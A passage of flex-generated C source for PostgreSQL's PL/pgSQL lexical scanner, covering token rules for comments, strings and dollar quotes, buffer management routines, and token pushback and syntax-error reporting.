"scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated quoted identifier"))); } YY_BREAK /* ---------- * Ignore whitespaces but remember this happened * ---------- */ case 76: /* rule 76 can match eol */ YY_RULE_SETUP #line 241 "scan.l" { plpgsql_SpaceScanned = true; } YY_BREAK /* ---------- * Eat up comments * ---------- */ case 77: YY_RULE_SETUP #line 247 "scan.l" ; YY_BREAK case 78: YY_RULE_SETUP #line 249 "scan.l" { start_lineno = plpgsql_scanner_lineno(); BEGIN(IN_COMMENT); } YY_BREAK case 79: YY_RULE_SETUP #line 252 "scan.l" { BEGIN(INITIAL); plpgsql_SpaceScanned = true; } YY_BREAK case 80: /* rule 80 can match eol */ YY_RULE_SETUP #line 253 "scan.l" ; YY_BREAK case 81: YY_RULE_SETUP #line 254 "scan.l" ; YY_BREAK case YY_STATE_EOF(IN_COMMENT): #line 255 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated comment"))); } YY_BREAK /* ---------- * Collect anything inside of ''s and return one STRING token * * Hacking plpgsql_base_yytext/plpgsql_base_yyleng here lets us avoid using yymore(), which is * a win for performance. It's safe because we know the underlying * input buffer is not changing. * ---------- */ case 82: YY_RULE_SETUP #line 270 "scan.l" { start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; BEGIN(IN_STRING); } YY_BREAK case 83: YY_RULE_SETUP #line 275 "scan.l" { /* for now, treat the same as a regular literal */ start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; BEGIN(IN_STRING); } YY_BREAK case 84: YY_RULE_SETUP #line 281 "scan.l" { } YY_BREAK case 85: YY_RULE_SETUP #line 282 "scan.l" { /* can only happen with \ at EOF */ } YY_BREAK case 86: YY_RULE_SETUP #line 283 "scan.l" { } YY_BREAK case 87: YY_RULE_SETUP #line 284 "scan.l" { /* tell plpgsql_get_string_value it's not a dollar quote */ dolqlen = 0; /* adjust plpgsql_base_yytext/plpgsql_base_yyleng to describe whole string token */ plpgsql_base_yyleng += (plpgsql_base_yytext - start_charpos); plpgsql_base_yytext = start_charpos; BEGIN(INITIAL); return T_STRING; } YY_BREAK case 88: /* rule 88 can match eol */ YY_RULE_SETUP #line 293 "scan.l" { } YY_BREAK case YY_STATE_EOF(IN_STRING): #line 294 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated string"))); } YY_BREAK case 89: YY_RULE_SETUP #line 301 "scan.l" { start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; dolqstart = pstrdup(plpgsql_base_yytext); BEGIN(IN_DOLLARQUOTE); } YY_BREAK case 90: YY_RULE_SETUP #line 307 "scan.l" { if (strcmp(plpgsql_base_yytext, dolqstart) == 0) { pfree(dolqstart); /* tell plpgsql_get_string_value it is a dollar quote */ dolqlen = plpgsql_base_yyleng; /* adjust plpgsql_base_yytext/plpgsql_base_yyleng to describe whole string token */ plpgsql_base_yyleng += (plpgsql_base_yytext - start_charpos); plpgsql_base_yytext = start_charpos; BEGIN(INITIAL); return T_STRING; } else { /* * When we fail to match $...$ to dolqstart, transfer * the $... part to the output, but put back the final * $ for rescanning. Consider $delim$...$junk$delim$ */ yyless(plpgsql_base_yyleng-1); } } YY_BREAK case 91: /* rule 91 can match eol */ YY_RULE_SETUP #line 329 "scan.l" { } YY_BREAK case 92: YY_RULE_SETUP #line 330 "scan.l" { /* needed for $ inside the quoted text */ } YY_BREAK case YY_STATE_EOF(IN_DOLLARQUOTE): #line 331 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated dollar-quoted string"))); } YY_BREAK /* ---------- * Any unmatched character is returned as is * ---------- */ case 93: YY_RULE_SETUP #line 342 "scan.l" { return plpgsql_base_yytext[0]; } YY_BREAK case 94: YY_RULE_SETUP #line 344 "scan.l" YY_FATAL_ERROR( "flex scanner jammed" ); YY_BREAK #line 2120 "pl_scan.c" case YY_STATE_EOF(INITIAL): yyterminate(); case YY_END_OF_BUFFER: { /* Amount of text matched not including the EOB char. */ int yy_amount_of_matched_text = (int) (yy_cp - (yytext_ptr)) - 1; /* Undo the effects of YY_DO_BEFORE_ACTION. */ *yy_cp = (yy_hold_char); YY_RESTORE_YY_MORE_OFFSET if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_NEW ) { /* We're scanning a new file or input source. It's * possible that this happened because the user * just pointed plpgsql_base_yyin at a new source and called * plpgsql_base_yylex(). If so, then we have to assure * consistency between YY_CURRENT_BUFFER and our * globals. Here is the right place to do so, because * this is the first action (other than possibly a * back-up) that will match for the new input source. */ (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars; YY_CURRENT_BUFFER_LVALUE->yy_input_file = plpgsql_base_yyin; YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_NORMAL; } /* Note that here we test for yy_c_buf_p "<=" to the position * of the first EOB in the buffer, since yy_c_buf_p will * already have been incremented past the NUL character * (since all states make transitions on EOB to the * end-of-buffer state). Contrast this with the test * in input(). */ if ( (yy_c_buf_p) <= &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] ) { /* This was really a NUL. */ yy_state_type yy_next_state; (yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text; yy_current_state = yy_get_previous_state( ); /* Okay, we're now positioned to make the NUL * transition. We couldn't have * yy_get_previous_state() go ahead and do it * for us because it doesn't know how to deal * with the possibility of jamming (and we don't * want to build jamming into it because then it * will run more slowly). */ yy_next_state = yy_try_NUL_trans( yy_current_state ); yy_bp = (yytext_ptr) + YY_MORE_ADJ; if ( yy_next_state ) { /* Consume the NUL. */ yy_cp = ++(yy_c_buf_p); yy_current_state = yy_next_state; goto yy_match; } else { yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); goto yy_find_action; } } else switch ( yy_get_next_buffer( ) ) { case EOB_ACT_END_OF_FILE: { (yy_did_buffer_switch_on_eof) = 0; if ( plpgsql_base_yywrap( ) ) { /* Note: because we've taken care in * yy_get_next_buffer() to have set up * plpgsql_base_yytext, we can now set up * yy_c_buf_p so that if some total * hoser (like flex itself) wants to * call the scanner after we return the * YY_NULL, it'll still work - another * YY_NULL will get returned. */ (yy_c_buf_p) = (yytext_ptr) + YY_MORE_ADJ; yy_act = YY_STATE_EOF(YY_START); goto do_action; } else { if ( ! (yy_did_buffer_switch_on_eof) ) YY_NEW_FILE; } break; } case EOB_ACT_CONTINUE_SCAN: (yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text; yy_current_state = yy_get_previous_state( ); yy_cp = (yy_c_buf_p); yy_bp = (yytext_ptr) + YY_MORE_ADJ; goto yy_match; case EOB_ACT_LAST_MATCH: (yy_c_buf_p) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)]; yy_current_state = yy_get_previous_state( ); yy_cp = (yy_c_buf_p); yy_bp = (yytext_ptr) + YY_MORE_ADJ; goto yy_find_action; } break; } default: YY_FATAL_ERROR( "fatal flex scanner internal error--no action found" ); } /* end of action switch */ } /* end of scanning one token */ } /* end of plpgsql_base_yylex */ /* yy_get_next_buffer - try to read in a new buffer * * Returns a code representing an action: * EOB_ACT_LAST_MATCH - * EOB_ACT_CONTINUE_SCAN - continue scanning from current position * EOB_ACT_END_OF_FILE - end of file */ static int yy_get_next_buffer (void) { register char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; register char *source = (yytext_ptr); register int number_to_move, i; int ret_val; if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] ) YY_FATAL_ERROR( "fatal flex scanner internal error--end of buffer missed" ); if ( YY_CURRENT_BUFFER_LVALUE->yy_fill_buffer == 0 ) { /* Don't try to fill the buffer, so this is an EOF. */ if ( (yy_c_buf_p) - (yytext_ptr) - YY_MORE_ADJ == 1 ) { /* We matched a single character, the EOB, so * treat this as a final EOF. */ return EOB_ACT_END_OF_FILE; } else { /* We matched some text prior to the EOB, first * process it. */ return EOB_ACT_LAST_MATCH; } } /* Try to read more data. */ /* First move last chars to start of buffer. */ number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr)) - 1; for ( i = 0; i < number_to_move; ++i ) *(dest++) = *(source++); if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_EOF_PENDING ) /* don't do the read, it's not guaranteed to return an EOF, * just force an EOF */ YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars) = 0; else { int num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; while ( num_to_read <= 0 ) { /* Not enough room in the buffer - grow it. */ /* just a shorter name for the current buffer */ YY_BUFFER_STATE b = YY_CURRENT_BUFFER; int yy_c_buf_p_offset = (int) ((yy_c_buf_p) - b->yy_ch_buf); if ( b->yy_is_our_buffer ) { int new_size = b->yy_buf_size * 2; if ( new_size <= 0 ) b->yy_buf_size += b->yy_buf_size / 8; else b->yy_buf_size *= 2; b->yy_ch_buf = (char *) /* Include room in for 2 EOB chars. */ plpgsql_base_yyrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 ); } else /* Can't grow it, we don't own it. */ b->yy_ch_buf = 0; if ( ! b->yy_ch_buf ) YY_FATAL_ERROR( "fatal error - scanner input buffer overflow" ); (yy_c_buf_p) = &b->yy_ch_buf[yy_c_buf_p_offset]; num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; } if ( num_to_read > YY_READ_BUF_SIZE ) num_to_read = YY_READ_BUF_SIZE; /* Read in more data. */ YY_INPUT( (&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]), (yy_n_chars), (size_t) num_to_read ); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } if ( (yy_n_chars) == 0 ) { if ( number_to_move == YY_MORE_ADJ ) { ret_val = EOB_ACT_END_OF_FILE; plpgsql_base_yyrestart(plpgsql_base_yyin ); } else { ret_val = EOB_ACT_LAST_MATCH; YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_EOF_PENDING; } } else ret_val = EOB_ACT_CONTINUE_SCAN; if ((yy_size_t) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { /* Extend the array by 50%, plus the number we really need. */ yy_size_t new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) plpgsql_base_yyrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size ); if ( ! YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" ); } (yy_n_chars) += number_to_move; YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] = YY_END_OF_BUFFER_CHAR; YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] = YY_END_OF_BUFFER_CHAR; (yytext_ptr) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[0]; return ret_val; } /* yy_get_previous_state - get the state just before the EOB char was reached */ static yy_state_type yy_get_previous_state (void) { register yy_state_type yy_current_state; register char *yy_cp; yy_current_state = (yy_start); yy_current_state += YY_AT_BOL(); for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp ) { register YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; } return yy_current_state; } /* yy_try_NUL_trans - try to make a transition on the NUL character * * synopsis * next_state = yy_try_NUL_trans( current_state ); */ static yy_state_type yy_try_NUL_trans (yy_state_type yy_current_state ) { register int yy_is_jam; register char *yy_cp = (yy_c_buf_p); register YY_CHAR yy_c = 1; if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; yy_is_jam = (yy_current_state == 372); return yy_is_jam ? 0 : yy_current_state; } #ifndef YY_NO_INPUT #ifdef __cplusplus static int yyinput (void) #else static int input (void) #endif { int c; *(yy_c_buf_p) = (yy_hold_char); if ( *(yy_c_buf_p) == YY_END_OF_BUFFER_CHAR ) { /* yy_c_buf_p now points to the character we want to return. * If this occurs *before* the EOB characters, then it's a * valid NUL; if not, then we've hit the end of the buffer. */ if ( (yy_c_buf_p) < &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] ) /* This was really a NUL. */ *(yy_c_buf_p) = '\0'; else { /* need more input */ int offset = (yy_c_buf_p) - (yytext_ptr); ++(yy_c_buf_p); switch ( yy_get_next_buffer( ) ) { case EOB_ACT_LAST_MATCH: /* This happens because yy_g_n_b() * sees that we've accumulated a * token and flags that we need to * try matching the token before * proceeding. But for input(), * there's no matching to consider. * So convert the EOB_ACT_LAST_MATCH * to EOB_ACT_END_OF_FILE. */ /* Reset buffer status. */ plpgsql_base_yyrestart(plpgsql_base_yyin ); /*FALLTHROUGH*/ case EOB_ACT_END_OF_FILE: { if ( plpgsql_base_yywrap( ) ) return EOF; if ( ! (yy_did_buffer_switch_on_eof) ) YY_NEW_FILE; #ifdef __cplusplus return yyinput(); #else return input(); #endif } case EOB_ACT_CONTINUE_SCAN: (yy_c_buf_p) = (yytext_ptr) + offset; break; } } } c = *(unsigned char *) (yy_c_buf_p); /* cast for 8-bit char's */ *(yy_c_buf_p) = '\0'; /* preserve plpgsql_base_yytext */ (yy_hold_char) = *++(yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_at_bol = (c == '\n'); return c; } #endif /* ifndef YY_NO_INPUT */ /** Immediately switch to a different input stream. * @param input_file A readable stream. * * @note This function does not reset the start condition to @c INITIAL . */ void plpgsql_base_yyrestart (FILE * input_file ) { if ( ! YY_CURRENT_BUFFER ){ plpgsql_base_yyensure_buffer_stack (); YY_CURRENT_BUFFER_LVALUE = plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); } plpgsql_base_yy_init_buffer(YY_CURRENT_BUFFER,input_file ); plpgsql_base_yy_load_buffer_state( ); } /** Switch to a different input buffer. * @param new_buffer The new input buffer. * */ void plpgsql_base_yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ) { /* TODO. We should be able to replace this entire function body * with * plpgsql_base_yypop_buffer_state(); * plpgsql_base_yypush_buffer_state(new_buffer); */ plpgsql_base_yyensure_buffer_stack (); if ( YY_CURRENT_BUFFER == new_buffer ) return; if ( YY_CURRENT_BUFFER ) { /* Flush out information for old buffer. */ *(yy_c_buf_p) = (yy_hold_char); YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } YY_CURRENT_BUFFER_LVALUE = new_buffer; plpgsql_base_yy_load_buffer_state( ); /* We don't actually know whether we did this switch during * EOF (plpgsql_base_yywrap()) processing, but the only time this flag * is looked at is after plpgsql_base_yywrap() is called, so it's safe * to go ahead and always set it. */ (yy_did_buffer_switch_on_eof) = 1; } static void plpgsql_base_yy_load_buffer_state (void) { (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars; (yytext_ptr) = (yy_c_buf_p) = YY_CURRENT_BUFFER_LVALUE->yy_buf_pos; plpgsql_base_yyin = YY_CURRENT_BUFFER_LVALUE->yy_input_file; (yy_hold_char) = *(yy_c_buf_p); } /** Allocate and initialize an input buffer state. * @param file A readable stream. * @param size The character buffer size in bytes. When in doubt, use @c YY_BUF_SIZE. * * @return the allocated buffer state. */ YY_BUFFER_STATE plpgsql_base_yy_create_buffer (FILE * file, int size ) { YY_BUFFER_STATE b; b = (YY_BUFFER_STATE) plpgsql_base_yyalloc(sizeof( struct yy_buffer_state ) ); if ( ! b ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_create_buffer()" ); b->yy_buf_size = size; /* yy_ch_buf has to be 2 characters longer than the size given because * we need to put in 2 end-of-buffer characters. */ b->yy_ch_buf = (char *) plpgsql_base_yyalloc(b->yy_buf_size + 2 ); if ( ! b->yy_ch_buf ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_create_buffer()" ); b->yy_is_our_buffer = 1; plpgsql_base_yy_init_buffer(b,file ); return b; } /** Destroy the buffer. * @param b a buffer created with plpgsql_base_yy_create_buffer() * */ void plpgsql_base_yy_delete_buffer (YY_BUFFER_STATE b ) { if ( ! b ) return; if ( b == YY_CURRENT_BUFFER ) /* Not sure if we should pop here. */ YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0; if ( b->yy_is_our_buffer ) plpgsql_base_yyfree((void *) b->yy_ch_buf ); plpgsql_base_yyfree((void *) b ); } /* Initializes or reinitializes a buffer. * This function is sometimes called more than once on the same buffer, * such as during a plpgsql_base_yyrestart() or at EOF. */ static void plpgsql_base_yy_init_buffer (YY_BUFFER_STATE b, FILE * file ) { int oerrno = errno; plpgsql_base_yy_flush_buffer(b ); b->yy_input_file = file; b->yy_fill_buffer = 1; /* If b is the current buffer, then plpgsql_base_yy_init_buffer was _probably_ * called from plpgsql_base_yyrestart() or through yy_get_next_buffer. * In that case, we don't want to reset the lineno or column. */ if (b != YY_CURRENT_BUFFER){ b->yy_bs_lineno = 1; b->yy_bs_column = 0; } b->yy_is_interactive = 0; errno = oerrno; } /** Discard all buffered characters. On the next scan, YY_INPUT will be called. * @param b the buffer state to be flushed, usually @c YY_CURRENT_BUFFER. * */ void plpgsql_base_yy_flush_buffer (YY_BUFFER_STATE b ) { if ( ! b ) return; b->yy_n_chars = 0; /* We always need two end-of-buffer characters. The first causes * a transition to the end-of-buffer state. The second causes * a jam in that state. */ b->yy_ch_buf[0] = YY_END_OF_BUFFER_CHAR; b->yy_ch_buf[1] = YY_END_OF_BUFFER_CHAR; b->yy_buf_pos = &b->yy_ch_buf[0]; b->yy_at_bol = 1; b->yy_buffer_status = YY_BUFFER_NEW; if ( b == YY_CURRENT_BUFFER ) plpgsql_base_yy_load_buffer_state( ); } /** Pushes the new state onto the stack. The new state becomes * the current state. This function will allocate the stack * if necessary. * @param new_buffer The new state. * */ void plpgsql_base_yypush_buffer_state (YY_BUFFER_STATE new_buffer ) { if (new_buffer == NULL) return; plpgsql_base_yyensure_buffer_stack(); /* This block is copied from plpgsql_base_yy_switch_to_buffer. */ if ( YY_CURRENT_BUFFER ) { /* Flush out information for old buffer. */ *(yy_c_buf_p) = (yy_hold_char); YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } /* Only push if top exists. Otherwise, replace top. */ if (YY_CURRENT_BUFFER) (yy_buffer_stack_top)++; YY_CURRENT_BUFFER_LVALUE = new_buffer; /* copied from plpgsql_base_yy_switch_to_buffer. */ plpgsql_base_yy_load_buffer_state( ); (yy_did_buffer_switch_on_eof) = 1; } /** Removes and deletes the top of the stack, if present. * The next element becomes the new top. * */ void plpgsql_base_yypop_buffer_state (void) { if (!YY_CURRENT_BUFFER) return; plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER ); YY_CURRENT_BUFFER_LVALUE = NULL; if ((yy_buffer_stack_top) > 0) --(yy_buffer_stack_top); if (YY_CURRENT_BUFFER) { plpgsql_base_yy_load_buffer_state( ); (yy_did_buffer_switch_on_eof) = 1; } } /* Allocates the stack if it does not exist. * Guarantees space for at least one push. */ static void plpgsql_base_yyensure_buffer_stack (void) { int num_to_alloc; if (!(yy_buffer_stack)) { /* First allocation is just for 2 elements, since we don't know if this * scanner will even need a stack. We use 2 instead of 1 to avoid an * immediate realloc on the next call. */ num_to_alloc = 1; (yy_buffer_stack) = (struct yy_buffer_state**)plpgsql_base_yyalloc (num_to_alloc * sizeof(struct yy_buffer_state*) ); if ( ! (yy_buffer_stack) ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yyensure_buffer_stack()" ); memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*)); (yy_buffer_stack_max) = num_to_alloc; (yy_buffer_stack_top) = 0; return; } if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){ /* Increase the buffer to prepare for a possible push. */ int grow_size = 8 /* arbitrary grow size */; num_to_alloc = (yy_buffer_stack_max) + grow_size; (yy_buffer_stack) = (struct yy_buffer_state**)plpgsql_base_yyrealloc ((yy_buffer_stack), num_to_alloc * sizeof(struct yy_buffer_state*) ); if ( ! (yy_buffer_stack) ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yyensure_buffer_stack()" ); /* zero only the new slots.*/ memset((yy_buffer_stack) + (yy_buffer_stack_max), 0, grow_size * sizeof(struct yy_buffer_state*)); (yy_buffer_stack_max) = num_to_alloc; } } /** Setup the input buffer state to scan directly from a user-specified character buffer. * @param base the character buffer * @param size the size in bytes of the character buffer * * @return the newly allocated buffer state object. */ YY_BUFFER_STATE plpgsql_base_yy_scan_buffer (char * base, yy_size_t size ) { YY_BUFFER_STATE b; if ( size < 2 || base[size-2] != YY_END_OF_BUFFER_CHAR || base[size-1] != YY_END_OF_BUFFER_CHAR ) /* They forgot to leave room for the EOB's. */ return 0; b = (YY_BUFFER_STATE) plpgsql_base_yyalloc(sizeof( struct yy_buffer_state ) ); if ( ! b ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_scan_buffer()" ); b->yy_buf_size = size - 2; /* "- 2" to take care of EOB's */ b->yy_buf_pos = b->yy_ch_buf = base; b->yy_is_our_buffer = 0; b->yy_input_file = 0; b->yy_n_chars = b->yy_buf_size; b->yy_is_interactive = 0; b->yy_at_bol = 1; b->yy_fill_buffer = 0; b->yy_buffer_status = YY_BUFFER_NEW; plpgsql_base_yy_switch_to_buffer(b ); return b; } /** Setup the input buffer state to scan a string. The next call to plpgsql_base_yylex() will * scan from a @e copy of @a str. * @param yystr a NUL-terminated string to scan * * @return the newly allocated buffer state object. * @note If you want to scan bytes that may contain NUL values, then use * plpgsql_base_yy_scan_bytes() instead. */ YY_BUFFER_STATE plpgsql_base_yy_scan_string (yyconst char * yystr ) { return plpgsql_base_yy_scan_bytes(yystr,strlen(yystr) ); } /** Setup the input buffer state to scan the given bytes. The next call to plpgsql_base_yylex() will * scan from a @e copy of @a bytes. * @param bytes the byte buffer to scan * @param len the number of bytes in the buffer pointed to by @a bytes. * * @return the newly allocated buffer state object. */ YY_BUFFER_STATE plpgsql_base_yy_scan_bytes (yyconst char * yybytes, int _yybytes_len ) { YY_BUFFER_STATE b; char *buf; yy_size_t n; int i; /* Get memory for full buffer, including space for trailing EOB's. */ n = _yybytes_len + 2; buf = (char *) plpgsql_base_yyalloc(n ); if ( ! buf ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_scan_bytes()" ); for ( i = 0; i < _yybytes_len; ++i ) buf[i] = yybytes[i]; buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR; b = plpgsql_base_yy_scan_buffer(buf,n ); if ( ! b ) YY_FATAL_ERROR( "bad buffer in plpgsql_base_yy_scan_bytes()" ); /* It's okay to grow etc. this buffer, and we should throw it * away when we're done. */ b->yy_is_our_buffer = 1; return b; } #ifndef YY_EXIT_FAILURE #define YY_EXIT_FAILURE 2 #endif static void yy_fatal_error (yyconst char* msg ) { (void) fprintf( stderr, "%s\n", msg ); exit( YY_EXIT_FAILURE ); } /* Redefine yyless() so it works in section 3 code. */ #undef yyless #define yyless(n) \ do \ { \ /* Undo effects of setting up plpgsql_base_yytext. */ \ int yyless_macro_arg = (n); \ YY_LESS_LINENO(yyless_macro_arg);\ plpgsql_base_yytext[plpgsql_base_yyleng] = (yy_hold_char); \ (yy_c_buf_p) = plpgsql_base_yytext + yyless_macro_arg; \ (yy_hold_char) = *(yy_c_buf_p); \ *(yy_c_buf_p) = '\0'; \ plpgsql_base_yyleng = yyless_macro_arg; \ } \ while ( 0 ) /* Accessor methods (get/set functions) to struct members. */ /** Get the current line number. * */ int plpgsql_base_yyget_lineno (void) { return plpgsql_base_yylineno; } /** Get the input stream. * */ FILE *plpgsql_base_yyget_in (void) { return plpgsql_base_yyin; } /** Get the output stream. * */ FILE *plpgsql_base_yyget_out (void) { return plpgsql_base_yyout; } /** Get the length of the current token. * */ int plpgsql_base_yyget_leng (void) { return plpgsql_base_yyleng; } /** Get the current token. * */ char *plpgsql_base_yyget_text (void) { return plpgsql_base_yytext; } /** Set the current line number. * @param line_number * */ void plpgsql_base_yyset_lineno (int line_number ) { plpgsql_base_yylineno = line_number; } /** Set the input stream. This does not discard the current * input buffer. * @param in_str A readable stream. * * @see plpgsql_base_yy_switch_to_buffer */ void plpgsql_base_yyset_in (FILE * in_str ) { plpgsql_base_yyin = in_str ; } void plpgsql_base_yyset_out (FILE * out_str ) { plpgsql_base_yyout = out_str ; } int plpgsql_base_yyget_debug (void) { return plpgsql_base_yy_flex_debug; } void plpgsql_base_yyset_debug (int bdebug ) { plpgsql_base_yy_flex_debug = bdebug ; } static int yy_init_globals (void) { /* Initialization is the same as for the non-reentrant scanner. * This function is called from plpgsql_base_yylex_destroy(), so don't allocate here. */ (yy_buffer_stack) = 0; (yy_buffer_stack_top) = 0; (yy_buffer_stack_max) = 0; (yy_c_buf_p) = (char *) 0; (yy_init) = 0; (yy_start) = 0; /* Defined in main.c */ #ifdef YY_STDINIT plpgsql_base_yyin = stdin; plpgsql_base_yyout = stdout; #else plpgsql_base_yyin = (FILE *) 0; plpgsql_base_yyout = (FILE *) 0; #endif /* For future reference: Set errno on error, since we are called by * plpgsql_base_yylex_init() */ return 0; } /* plpgsql_base_yylex_destroy is for both reentrant and non-reentrant scanners. */ int plpgsql_base_yylex_destroy (void) { /* Pop the buffer stack, destroying each element. */ while(YY_CURRENT_BUFFER){ plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER ); YY_CURRENT_BUFFER_LVALUE = NULL; plpgsql_base_yypop_buffer_state(); } /* Destroy the stack itself. */ plpgsql_base_yyfree((yy_buffer_stack) ); (yy_buffer_stack) = NULL; /* Reset the globals. This is important in a non-reentrant scanner so the next time * plpgsql_base_yylex() is called, initialization will occur. */ yy_init_globals( ); return 0; } /* * Internal utility routines. */ #ifndef yytext_ptr static void yy_flex_strncpy (char* s1, yyconst char * s2, int n ) { register int i; for ( i = 0; i < n; ++i ) s1[i] = s2[i]; } #endif #ifdef YY_NEED_STRLEN static int yy_flex_strlen (yyconst char * s ) { register int n; for ( n = 0; s[n]; ++n ) ; return n; } #endif void *plpgsql_base_yyalloc (yy_size_t size ) { return (void *) malloc( size ); } void *plpgsql_base_yyrealloc (void * ptr, yy_size_t size ) { /* The cast to (char *) in the following accommodates both * implementations that use char* generic pointers, and those * that use void* generic pointers. It works with the latter * because both ANSI C and C++ allow castless assignment from * any pointer type to void*, and deal with argument conversions * as though doing an assignment. */ return (void *) realloc( (char *) ptr, size ); } void plpgsql_base_yyfree (void * ptr ) { free( (char *) ptr ); /* see plpgsql_base_yyrealloc() for (char *) cast */ } #define YYTABLES_NAME "yytables" #line 344 "scan.l" /* * This is the plpgsql_base_yylex routine called from outside. It exists to provide * a one-token pushback facility. Beware of trying to make it do more: * for the most part, plpgsql's gram.y assumes that plpgsql_base_yytext is in step * with the "current token". */ int plpgsql_yylex(void) { if (have_pushback_token) { have_pushback_token = false; return pushback_token; } return plpgsql_base_yylex(); } /* * Push back a single token to be re-read by next plpgsql_yylex() call. * * NOTE: this does not cause plpgsql_base_yytext to "back up". */ void plpgsql_push_back_token(int token) { if (have_pushback_token) elog(ERROR, "cannot push back multiple tokens"); pushback_token = token; have_pushback_token = true; } /* * Report a syntax error. */ void plpgsql_yyerror(const char *message) { const char *loc = plpgsql_base_yytext; int cursorpos; plpgsql_error_lineno = plpgsql_scanner_lineno(); /* in multibyte encodings, return index in characters not bytes */ cursorpos = pg_mbstrlen_with_len(scanbuf, loc - scanbuf) + 1; if (*loc == YY_END_OF_BUFFER_CHAR) { ereport(ERROR, (errcode(ERRCODE_SYNTAX_ERROR), /* translator: %s is typically "syntax error" */ errmsg("%s at end of input", message), internalerrposition(cursorpos), internalerrquery(scanstr))); } else { ereport(ERROR, (errcode(ERRCODE_SYNTAX_ERROR), /* translator: first %s is typically "syntax error" */ errmsg("%s at or near \"%s\"", message, loc), internalerrposition(cursorpos), internalerrquery(scanstr))); } } /* * Get the line number at which the current token ends. This substitutes * for flex's very poorly implemented plpgsql_base_yylineno facility. * * We assume that flex has written a '\0' over the character following the * current token in scanbuf. So, we just have to count the '\n' characters * before that. We optimize this a little by keeping track of the last * '\n' seen so far. */ int plpgsql_scanner_lineno(void) { const char *c; while ((c = 